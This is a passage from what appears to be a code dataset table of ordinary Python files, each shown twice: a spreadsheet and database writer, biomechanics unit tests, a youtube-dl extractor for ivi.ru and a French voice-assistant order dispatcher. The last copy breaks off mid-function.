code
stringlengths 2k
1.04M
| repo_path
stringlengths 5
517
| parsed_code
stringlengths 0
1.04M
| quality_prob
float64 0.02
0.95
| learning_prob
float64 0.02
0.93
|
---|---|---|---|---|
from enum import Enum
from typing import List
from typing import Any
from tempfile import NamedTemporaryFile
from openpyxl import Workbook
from openpyxl.styles import NamedStyle
from openpyxl.styles import PatternFill
from validator.loader import file_nt
from validator.engine.errors import TaskMessage
error_style = NamedStyle(name='error')
error_style.fill = PatternFill(start_color='00FF0000',
end_color='00FF0000',
fill_type='solid')
class TaskStatus(Enum):
IN_PROGRESS = 0
COMPLETED = 1
FAILED = 2
class ExcelWriter:
def __init__(self,
*,
headers: List[str],
stream: List[Any],
obj_key: file_nt,
duplicate_file: bool = False):
self.headers = headers
self.obj_key = obj_key
self.duplicated_file = duplicate_file
self.wb = Workbook()
self.ws = self.wb.active
self.ws.title = 'Data'
self.ws.append([
" ".join(field.split('_')).capitalize()
for field in self.headers
])
self.write_sheet(stream)
@property
def duplicated_file(self):
return self._duplicated
@duplicated_file.setter
def duplicated_file(self, value):
self._duplicated = value
if not value:
self.headers.append('error_details')
def write_sheet(self, stream):
for row_idx, item in enumerate(stream):
self.write_rows_excel(row_idx=row_idx + 2, data=item)
def write_rows_excel(self, *, row_idx, data: dict):
"""Write a row to the Worksheet
Args:
data (dict): specify row data
row_idx (int): specify row index
"""
col_idx = 1
temp = data.get('data')._asdict()
errors = data.pop('errors', None)
for name, value in temp.items():
cell = self.ws.cell(column=col_idx, row=row_idx, value=value)
if errors and name in errors:
cell.style = error_style
col_idx += 1
self.ws.cell(column=col_idx,
row=row_idx,
value=data.get('error_msg'))
def upload_to_s3(self, *, client, bucket_name):
if self.duplicated_file:
post_fix = 'duplicates'
else:
post_fix = 'errors'
obj_key = (f'output/{self.obj_key.task_id}'
f'/{self.obj_key.file.name}_{post_fix}.xlsx')
with NamedTemporaryFile() as tmp:
self.wb.save(tmp.name)
tmp.seek(0)
client.upload_fileobj(tmp,
bucket_name,
obj_key)
class DBWriter:
def __init__(self,
*,
task_id: str,
cursor):
self._cursor = cursor
self.task_id = task_id
@property
def task_id(self):
return self.task_id
@task_id.setter
def task_id(self, value):
"""Create a task in DB"""
query = 'INSERT INTO "public"."task" (task_id) VALUES (:task_id)'
self._cursor.execute(query, {'task_id': int(value)})
def update_task(self,
*,
status: TaskStatus,
msg: TaskMessage = None,
details: str = None,
total: int = 0,
failed: int = 0,
duplicated: int = 0):
"""Update details of a task
Args:
status (str): specify task status
msg (TaskMessage): specify error message
details (str): specify details of error
total (int): specify total records
failed (int): specify total failed records
duplicated (int): specify total duplicated records
"""
query = (
'UPDATE "public"."task" SET '
'status = :status,'
'message = :msg,'
'details = :details,'
'total = :total,'
'failed = :failed,'
'duplicated = :duplicated '
'WHERE task_id = :task_id'
)
self._cursor.execute(
query,
{
'status': status,
'msg': msg,
'details': details,
'total': total,
'failed': failed,
'duplicated': duplicated,
'task_id': self.task_id
}
)
def write_users(self, *, headers, stream):
pass
|
validator/writer.py
|
from enum import Enum
from typing import List
from typing import Any
from tempfile import NamedTemporaryFile
from openpyxl import Workbook
from openpyxl.styles import NamedStyle
from openpyxl.styles import PatternFill
from validator.loader import file_nt
from validator.engine.errors import TaskMessage
error_style = NamedStyle(name='error')
error_style.fill = PatternFill(start_color='00FF0000',
end_color='00FF0000',
fill_type='solid')
class TaskStatus(Enum):
IN_PROGRESS = 0
COMPLETED = 1
FAILED = 2
class ExcelWriter:
def __init__(self,
*,
headers: List[str],
stream: List[Any],
obj_key: file_nt,
duplicate_file: bool = False):
self.headers = headers
self.obj_key = obj_key
self.duplicated_file = duplicate_file
self.wb = Workbook()
self.ws = self.wb.active
self.ws.title = 'Data'
self.ws.append([
" ".join(field.split('_')).capitalize()
for field in self.headers
])
self.write_sheet(stream)
@property
def duplicated_file(self):
return self._duplicated
@duplicated_file.setter
def duplicated_file(self, value):
self._duplicated = value
if not value:
self.headers.append('error_details')
def write_sheet(self, stream):
for row_idx, item in enumerate(stream):
self.write_rows_excel(row_idx=row_idx + 2, data=item)
def write_rows_excel(self, *, row_idx, data: dict):
"""Write a row to the Worksheet
Args:
data (dict): specify row data
row_idx (int): specify row index
"""
col_idx = 1
temp = data.get('data')._asdict()
errors = data.pop('errors', None)
for name, value in temp.items():
cell = self.ws.cell(column=col_idx, row=row_idx, value=value)
if errors and name in errors:
cell.style = error_style
col_idx += 1
self.ws.cell(column=col_idx,
row=row_idx,
value=data.get('error_msg'))
def upload_to_s3(self, *, client, bucket_name):
if self.duplicated_file:
post_fix = 'duplicates'
else:
post_fix = 'errors'
obj_key = (f'output/{self.obj_key.task_id}'
f'/{self.obj_key.file.name}_{post_fix}.xlsx')
with NamedTemporaryFile() as tmp:
self.wb.save(tmp.name)
tmp.seek(0)
client.upload_fileobj(tmp,
bucket_name,
obj_key)
class DBWriter:
def __init__(self,
*,
task_id: str,
cursor):
self._cursor = cursor
self.task_id = task_id
@property
def task_id(self):
return self.task_id
@task_id.setter
def task_id(self, value):
"""Create a task in DB"""
query = 'INSERT INTO "public"."task" (task_id) VALUES (:task_id)'
self._cursor.execute(query, {'task_id': int(value)})
def update_task(self,
*,
status: TaskStatus,
msg: TaskMessage = None,
details: str = None,
total: int = 0,
failed: int = 0,
duplicated: int = 0):
"""Update details of a task
Args:
status (str): specify task status
msg (TaskMessage): specify error message
details (str): specify details of error
total (int): specify total records
failed (int): specify total failed records
duplicated (int): specify total duplicated records
"""
query = (
'UPDATE "public"."task" SET '
'status = :status,'
'message = :msg,'
'details = :details,'
'total = :total,'
'failed = :failed,'
'duplicated = :duplicated '
'WHERE task_id = :task_id'
)
self._cursor.execute(
query,
{
'status': status,
'msg': msg,
'details': details,
'total': total,
'failed': failed,
'duplicated': duplicated,
'task_id': self.task_id
}
)
def write_users(self, *, headers, stream):
pass
| 0.722625 | 0.137012 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2020 <NAME>"
__email__ = "<EMAIL>"
__license__ = "Apache 2.0"
"""
Unit tests for the inversedynamics module.
"""
import kineticstoolkit as ktk
import numpy as np
import warnings
def test_calculate_proximal_wrenches_2d_static():
"""
Test calculate_proximal_wrenches for a 2d static case
| 80 N
| y ^
| |
m=3kg V |
o======1=======2m -----> x
This test uses this 2d figure on a 5 second-long simulated static trial
with automatic reconstruction of COMPosition, ComAcceleration,
SegmentAngles, AngularVelocity and AngularAcceleration.
"""
n_points = 100
ts = ktk.TimeSeries(time=np.linspace(0, 1, n_points))
ts.data['ProximalJointPosition'] = np.repeat(
np.array([[0, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalJointPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['ForceApplicationPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalForces'] = np.repeat(
np.array([[0, 80, 0, 0]]), n_points, axis=0)
ts.data['DistalMoments'] = np.repeat(
np.array([[0, 0, 0, 0]]), n_points, axis=0)
inertial_constants = {
'Mass': 3,
'COMProximalRatio': 0.5,
'GyrationCOMRatio': 0.1,
}
# Catch warnings because we use automatic com/angle/vel/acc calculation,
# which generate warnings.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=UserWarning)
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(
np.nanmedian(prox.data['ProximalForces'], axis=0),
[0., 80 + 3. * 9.81, 0., 0.])
assert np.allclose(
np.nanmedian(prox.data['ProximalMoments'], axis=0),
[0., 0., 160 + 3. * 9.81, 0.])
def test_calculate_proximal_wrenches_2d_dynamic():
"""
Test various dynamic situations based on dummy kinematic values.
| 80 N
| y ^
| |
m=3kg V |
o======1=======2m -----> x
These tests are only on one-point timeseries, with fake accelerations
and velocities. The aim is to test the wrench equations, not the
calculation of accelerations, velocities, etc.
"""
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[2, 0, 0, 1]])
ts.data['COMPosition'] = np.array([[1, 0, 0, 1]])
ts.data['ForceApplicationPosition'] = np.array([[2, 0, 0, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
# Test 1: Fully static
ts.data['COMAcceleration'] = np.array([[0, 0, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.all(np.abs(prox.data['ProximalForces'][0] -
[0., 80 + 3. * 9.81, 0., 0.]) < 1E-10)
assert np.all(np.abs(prox.data['ProximalMoments'][0] -
[0., 0., 160 + 3. * 9.81, 0.]) < 1E-10)
# Test 2: The origin is fixed and the segment is not turning but has an
# angular acceleration of 1 rad/s2. This means the COM has an upward
# linear acceleration of 1 m/s2. We expect the y proximal force to have
# an additional (ma) component upward. For the moments, we expect an
# additional z proximal moment of (Ialpha) = I
# I = mk^2 + md^2 = 0.04 * 3 + 3 = 3.12
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 1]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[0., 0., (160 + 3. * 9.81) + 3.12, 0.])
# Test 3: Like test 2 but by swapping x and z (Fz <--> Fx, -Mx <--> Mz)
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[0, 0, 2, 1]])
ts.data['COMPosition'] = np.array([[0, 0, 1, 1]])
ts.data['ForceApplicationPosition'] = np.array([[0, 0, 2, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[-1, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[-((160 + 3. * 9.81) + 3.12), 0., 0., 0.])
if __name__ == "__main__":
import pytest
pytest.main([__file__])
|
tests/test_inversedynamics.py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2020 <NAME>"
__email__ = "<EMAIL>"
__license__ = "Apache 2.0"
"""
Unit tests for the inversedynamics module.
"""
import kineticstoolkit as ktk
import numpy as np
import warnings
def test_calculate_proximal_wrenches_2d_static():
"""
Test calculate_proximal_wrenches for a 2d static case
| 80 N
| y ^
| |
m=3kg V |
o======1=======2m -----> x
This test uses this 2d figure on a 5 second-long simulated static trial
with automatic reconstruction of COMPosition, ComAcceleration,
SegmentAngles, AngularVelocity and AngularAcceleration.
"""
n_points = 100
ts = ktk.TimeSeries(time=np.linspace(0, 1, n_points))
ts.data['ProximalJointPosition'] = np.repeat(
np.array([[0, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalJointPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['ForceApplicationPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalForces'] = np.repeat(
np.array([[0, 80, 0, 0]]), n_points, axis=0)
ts.data['DistalMoments'] = np.repeat(
np.array([[0, 0, 0, 0]]), n_points, axis=0)
inertial_constants = {
'Mass': 3,
'COMProximalRatio': 0.5,
'GyrationCOMRatio': 0.1,
}
# Catch warnings because we use automatic com/angle/vel/acc calculation,
# which generate warnings.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=UserWarning)
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(
np.nanmedian(prox.data['ProximalForces'], axis=0),
[0., 80 + 3. * 9.81, 0., 0.])
assert np.allclose(
np.nanmedian(prox.data['ProximalMoments'], axis=0),
[0., 0., 160 + 3. * 9.81, 0.])
def test_calculate_proximal_wrenches_2d_dynamic():
"""
Test various dynamic situations based on dummy kinematic values.
| 80 N
| y ^
| |
m=3kg V |
o======1=======2m -----> x
These tests are only on one-point timeseries, with fake accelerations
and velocities. The aim is to test the wrench equations, not the
calculation of accelerations, velocities, etc.
"""
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[2, 0, 0, 1]])
ts.data['COMPosition'] = np.array([[1, 0, 0, 1]])
ts.data['ForceApplicationPosition'] = np.array([[2, 0, 0, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
# Test 1: Fully static
ts.data['COMAcceleration'] = np.array([[0, 0, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.all(np.abs(prox.data['ProximalForces'][0] -
[0., 80 + 3. * 9.81, 0., 0.]) < 1E-10)
assert np.all(np.abs(prox.data['ProximalMoments'][0] -
[0., 0., 160 + 3. * 9.81, 0.]) < 1E-10)
# Test 2: The origin is fixed and the segment is not turning but has an
# angular acceleration of 1 rad/s2. This means the COM has an upward
# linear acceleration of 1 m/s2. We expect the y proximal force to have
# an additional (ma) component upward. For the moments, we expect an
# additional z proximal moment of (Ialpha) = I
# I = mk^2 + md^2 = 0.04 * 3 + 3 = 3.12
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 1]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[0., 0., (160 + 3. * 9.81) + 3.12, 0.])
# Test 3: Like test 2 but by swapping x and z (Fz <--> Fx, -Mx <--> Mz)
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[0, 0, 2, 1]])
ts.data['COMPosition'] = np.array([[0, 0, 1, 1]])
ts.data['ForceApplicationPosition'] = np.array([[0, 0, 2, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[-1, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[-((160 + 3. * 9.81) + 3.12), 0., 0., 0.])
if __name__ == "__main__":
import pytest
pytest.main([__file__])
| 0.889643 | 0.620765 |
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
ExtractorError,
)
class IviIE(InfoExtractor):
IE_DESC = 'ivi.ru'
IE_NAME = 'ivi'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/(?:watch/(?:[^/]+/)?|video/player\?.*?videoId=)(?P<id>\d+)'
_TESTS = [
# Single movie
{
'url': 'http://www.ivi.ru/watch/53141',
'md5': '6ff5be2254e796ed346251d117196cf4',
'info_dict': {
'id': '53141',
'ext': 'mp4',
'title': '<NAME> меняет профессию',
'description': 'md5:b924063ea1677c8fe343d8a72ac2195f',
'duration': 5498,
'thumbnail': 'http://thumbs.ivi.ru/f20.vcp.digitalaccess.ru/contents/d/1/c3c885163a082c29bceeb7b5a267a6.jpg',
},
'skip': 'Only works from Russia',
},
# Serial's serie
{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/9549',
'md5': '221f56b35e3ed815fde2df71032f4b3e',
'info_dict': {
'id': '9549',
'ext': 'mp4',
'title': 'Двое из ларца - Серия 1',
'duration': 2655,
'thumbnail': 'http://thumbs.ivi.ru/f15.vcp.digitalaccess.ru/contents/8/4/0068dc0677041f3336b7c2baad8fc0.jpg',
},
'skip': 'Only works from Russia',
}
]
# Sorted by quality
_known_formats = ['MP4-low-mobile', 'MP4-mobile', 'FLV-lo', 'MP4-lo', 'FLV-hi', 'MP4-hi', 'MP4-SHQ']
# Sorted by size
_known_thumbnails = ['Thumb-120x90', 'Thumb-160', 'Thumb-640x480']
def _extract_description(self, html):
m = re.search(r'<meta name="description" content="(?P<description>[^"]+)"/>', html)
return m.group('description') if m is not None else None
def _extract_comment_count(self, html):
m = re.search('(?s)<a href="#" id="view-comments" class="action-button dim gradient">\s*Комментарии:\s*(?P<commentcount>\d+)\s*</a>', html)
return int(m.group('commentcount')) if m is not None else 0
def _real_extract(self, url):
video_id = self._match_id(url)
api_url = 'http://api.digitalaccess.ru/api/json/'
data = {
'method': 'da.content.get',
'params': [
video_id, {
'site': 's183',
'referrer': 'http://www.ivi.ru/watch/%s' % video_id,
'contentid': video_id
}
]
}
request = compat_urllib_request.Request(api_url, json.dumps(data))
video_json_page = self._download_webpage(
request, video_id, 'Downloading video JSON')
video_json = json.loads(video_json_page)
if 'error' in video_json:
error = video_json['error']
if error['origin'] == 'NoRedisValidData':
raise ExtractorError('Video %s does not exist' % video_id, expected=True)
raise ExtractorError(
'Unable to download video %s: %s' % (video_id, error['message']),
expected=True)
result = video_json['result']
formats = [{
'url': x['url'],
'format_id': x['content_format'],
'preference': self._known_formats.index(x['content_format']),
} for x in result['files'] if x['content_format'] in self._known_formats]
self._sort_formats(formats)
if not formats:
raise ExtractorError('No media links available for %s' % video_id)
duration = result['duration']
compilation = result['compilation']
title = result['title']
title = '%s - %s' % (compilation, title) if compilation is not None else title
previews = result['preview']
previews.sort(key=lambda fmt: self._known_thumbnails.index(fmt['content_format']))
thumbnail = previews[-1]['url'] if len(previews) > 0 else None
video_page = self._download_webpage(url, video_id, 'Downloading video page')
description = self._extract_description(video_page)
comment_count = self._extract_comment_count(video_page)
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'description': description,
'duration': duration,
'comment_count': comment_count,
'formats': formats,
}
class IviCompilationIE(InfoExtractor):
IE_DESC = 'ivi.ru compilations'
IE_NAME = 'ivi:compilation'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/watch/(?!\d+)(?P<compilationid>[a-z\d_-]+)(?:/season(?P<seasonid>\d+))?$'
_TESTS = [{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa',
'info_dict': {
'id': 'dvoe_iz_lartsa',
'title': 'Двое из ларца (2006 - 2008)',
},
'playlist_mincount': 24,
}, {
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/season1',
'info_dict': {
'id': 'dvoe_iz_lartsa/season1',
'title': 'Двое из ларца (2006 - 2008) 1 сезон',
},
'playlist_mincount': 12,
}]
def _extract_entries(self, html, compilation_id):
return [self.url_result('http://www.ivi.ru/watch/%s/%s' % (compilation_id, serie), 'Ivi')
for serie in re.findall(r'<strong><a href="/watch/%s/(\d+)">(?:[^<]+)</a></strong>' % compilation_id, html)]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
compilation_id = mobj.group('compilationid')
season_id = mobj.group('seasonid')
if season_id is not None: # Season link
season_page = self._download_webpage(url, compilation_id, 'Downloading season %s web page' % season_id)
playlist_id = '%s/season%s' % (compilation_id, season_id)
playlist_title = self._html_search_meta('title', season_page, 'title')
entries = self._extract_entries(season_page, compilation_id)
else: # Compilation link
compilation_page = self._download_webpage(url, compilation_id, 'Downloading compilation web page')
playlist_id = compilation_id
playlist_title = self._html_search_meta('title', compilation_page, 'title')
seasons = re.findall(r'<a href="/watch/%s/season(\d+)">[^<]+</a>' % compilation_id, compilation_page)
if len(seasons) == 0: # No seasons in this compilation
entries = self._extract_entries(compilation_page, compilation_id)
else:
entries = []
for season_id in seasons:
season_page = self._download_webpage(
'http://www.ivi.ru/watch/%s/season%s' % (compilation_id, season_id),
compilation_id, 'Downloading season %s web page' % season_id)
entries.extend(self._extract_entries(season_page, compilation_id))
return self.playlist_result(entries, playlist_id, playlist_title)
|
youtube_dl/extractor/ivi.py
|
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
ExtractorError,
)
class IviIE(InfoExtractor):
IE_DESC = 'ivi.ru'
IE_NAME = 'ivi'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/(?:watch/(?:[^/]+/)?|video/player\?.*?videoId=)(?P<id>\d+)'
_TESTS = [
# Single movie
{
'url': 'http://www.ivi.ru/watch/53141',
'md5': '6ff5be2254e796ed346251d117196cf4',
'info_dict': {
'id': '53141',
'ext': 'mp4',
'title': '<NAME> меняет профессию',
'description': 'md5:b924063ea1677c8fe343d8a72ac2195f',
'duration': 5498,
'thumbnail': 'http://thumbs.ivi.ru/f20.vcp.digitalaccess.ru/contents/d/1/c3c885163a082c29bceeb7b5a267a6.jpg',
},
'skip': 'Only works from Russia',
},
# Serial's serie
{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/9549',
'md5': '221f56b35e3ed815fde2df71032f4b3e',
'info_dict': {
'id': '9549',
'ext': 'mp4',
'title': 'Двое из ларца - Серия 1',
'duration': 2655,
'thumbnail': 'http://thumbs.ivi.ru/f15.vcp.digitalaccess.ru/contents/8/4/0068dc0677041f3336b7c2baad8fc0.jpg',
},
'skip': 'Only works from Russia',
}
]
# Sorted by quality
_known_formats = ['MP4-low-mobile', 'MP4-mobile', 'FLV-lo', 'MP4-lo', 'FLV-hi', 'MP4-hi', 'MP4-SHQ']
# Sorted by size
_known_thumbnails = ['Thumb-120x90', 'Thumb-160', 'Thumb-640x480']
def _extract_description(self, html):
m = re.search(r'<meta name="description" content="(?P<description>[^"]+)"/>', html)
return m.group('description') if m is not None else None
def _extract_comment_count(self, html):
m = re.search('(?s)<a href="#" id="view-comments" class="action-button dim gradient">\s*Комментарии:\s*(?P<commentcount>\d+)\s*</a>', html)
return int(m.group('commentcount')) if m is not None else 0
def _real_extract(self, url):
video_id = self._match_id(url)
api_url = 'http://api.digitalaccess.ru/api/json/'
data = {
'method': 'da.content.get',
'params': [
video_id, {
'site': 's183',
'referrer': 'http://www.ivi.ru/watch/%s' % video_id,
'contentid': video_id
}
]
}
request = compat_urllib_request.Request(api_url, json.dumps(data))
video_json_page = self._download_webpage(
request, video_id, 'Downloading video JSON')
video_json = json.loads(video_json_page)
if 'error' in video_json:
error = video_json['error']
if error['origin'] == 'NoRedisValidData':
raise ExtractorError('Video %s does not exist' % video_id, expected=True)
raise ExtractorError(
'Unable to download video %s: %s' % (video_id, error['message']),
expected=True)
result = video_json['result']
formats = [{
'url': x['url'],
'format_id': x['content_format'],
'preference': self._known_formats.index(x['content_format']),
} for x in result['files'] if x['content_format'] in self._known_formats]
self._sort_formats(formats)
if not formats:
raise ExtractorError('No media links available for %s' % video_id)
duration = result['duration']
compilation = result['compilation']
title = result['title']
title = '%s - %s' % (compilation, title) if compilation is not None else title
previews = result['preview']
previews.sort(key=lambda fmt: self._known_thumbnails.index(fmt['content_format']))
thumbnail = previews[-1]['url'] if len(previews) > 0 else None
video_page = self._download_webpage(url, video_id, 'Downloading video page')
description = self._extract_description(video_page)
comment_count = self._extract_comment_count(video_page)
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'description': description,
'duration': duration,
'comment_count': comment_count,
'formats': formats,
}
class IviCompilationIE(InfoExtractor):
IE_DESC = 'ivi.ru compilations'
IE_NAME = 'ivi:compilation'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/watch/(?!\d+)(?P<compilationid>[a-z\d_-]+)(?:/season(?P<seasonid>\d+))?$'
_TESTS = [{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa',
'info_dict': {
'id': 'dvoe_iz_lartsa',
'title': 'Двое из ларца (2006 - 2008)',
},
'playlist_mincount': 24,
}, {
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/season1',
'info_dict': {
'id': 'dvoe_iz_lartsa/season1',
'title': 'Двое из ларца (2006 - 2008) 1 сезон',
},
'playlist_mincount': 12,
}]
def _extract_entries(self, html, compilation_id):
return [self.url_result('http://www.ivi.ru/watch/%s/%s' % (compilation_id, serie), 'Ivi')
for serie in re.findall(r'<strong><a href="/watch/%s/(\d+)">(?:[^<]+)</a></strong>' % compilation_id, html)]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
compilation_id = mobj.group('compilationid')
season_id = mobj.group('seasonid')
if season_id is not None: # Season link
season_page = self._download_webpage(url, compilation_id, 'Downloading season %s web page' % season_id)
playlist_id = '%s/season%s' % (compilation_id, season_id)
playlist_title = self._html_search_meta('title', season_page, 'title')
entries = self._extract_entries(season_page, compilation_id)
else: # Compilation link
compilation_page = self._download_webpage(url, compilation_id, 'Downloading compilation web page')
playlist_id = compilation_id
playlist_title = self._html_search_meta('title', compilation_page, 'title')
seasons = re.findall(r'<a href="/watch/%s/season(\d+)">[^<]+</a>' % compilation_id, compilation_page)
if len(seasons) == 0: # No seasons in this compilation
entries = self._extract_entries(compilation_page, compilation_id)
else:
entries = []
for season_id in seasons:
season_page = self._download_webpage(
'http://www.ivi.ru/watch/%s/season%s' % (compilation_id, season_id),
compilation_id, 'Downloading season %s web page' % season_id)
entries.extend(self._extract_entries(season_page, compilation_id))
return self.playlist_result(entries, playlist_id, playlist_title)
| 0.481941 | 0.129293 |
from core.skills import skillsLoader
from core.utils.cleanOrder import *
def executeSkill(orderJson): # Traitement d'un ordre (complexe)
order = orderJson["msg"]
if(order == "") :
return "Je ne vous ai pas entendu"
orders = order.split(",") # On regarde si on peut séparer l'ordre en 2 (si il y a une virgule)
returns = []
if len(orders) > 1: # Ordre multiple
for order in orders:
if not toIgnore(order):
newOrderJson = orderJson
newOrderJson["msg"] = order.lstrip().rstrip()
returns.append(computeOrder(newOrderJson) + "\n") # On ne répond qu'aux ordres pertinents
finalreturn = ""
for a in returns:
finalreturn += a
return finalreturn
else:
return computeOrder(orderJson)
def computeOrder(orderJson): # Traitement d'un ordre simple (splité)
for skill in skillsLoader.SkillsList:
if skill.ask(orderJson["msg"]): # Si la phrase demandée est connue
return skill.execute(orderJson)
scores = [] # Sinon, on calcule les scores de similarité
for skill in skillsLoader.SkillsList:
scores.append(skill.similitude(orderJson["msg"]))
maxSimilitude = max(scores)
maxSimilitudeIndex = scores.index(maxSimilitude)
secScores = []
secScores += scores
secScores[maxSimilitudeIndex] = 0
secMaxSimilitude = max(secScores)
secMaxSimilitudeIndex = scores.index(secMaxSimilitude)
print(scores) # Debug
if (secMaxSimilitude == maxSimilitude):
print("2 phrases de meme similarite !")
return "Je ne comprends pas cette phrase."
if (maxSimilitude == 0): # Si on a aucun mot commun nulle part
print("Pas de mot commun !")
return "Je ne comprends pas cette phrase."
if maxSimilitude > 3 * secMaxSimilitude:
if (maxSimilitude >= 10):
return (skillsLoader.SkillsList[maxSimilitudeIndex].execute(orderJson))
return ("Je ne comprends pas cette phrase")
|
core/core.py
|
from core.skills import skillsLoader
from core.utils.cleanOrder import *
def executeSkill(orderJson): # Traitement d'un ordre (complexe)
order = orderJson["msg"]
if(order == "") :
return "Je ne vous ai pas entendu"
orders = order.split(",") # On regarde si on peut séparer l'ordre en 2 (si il y a une virgule)
returns = []
if len(orders) > 1: # Ordre multiple
for order in orders:
if not toIgnore(order):
newOrderJson = orderJson
newOrderJson["msg"] = order.lstrip().rstrip()
returns.append(computeOrder(newOrderJson) + "\n") # On ne répond qu'aux ordres pertinents
finalreturn = ""
for a in returns:
finalreturn += a
return finalreturn
else:
return computeOrder(orderJson)
def computeOrder(orderJson): # Traitement d'un ordre simple (splité)
for skill in skillsLoader.SkillsList:
if skill.ask(orderJson["msg"]): # Si la phrase demandée est connue
return skill.execute(orderJson)
scores = [] # Sinon, on calcule les scores de similarité
for skill in skillsLoader.SkillsList:
scores.append(skill.similitude(orderJson["msg"]))
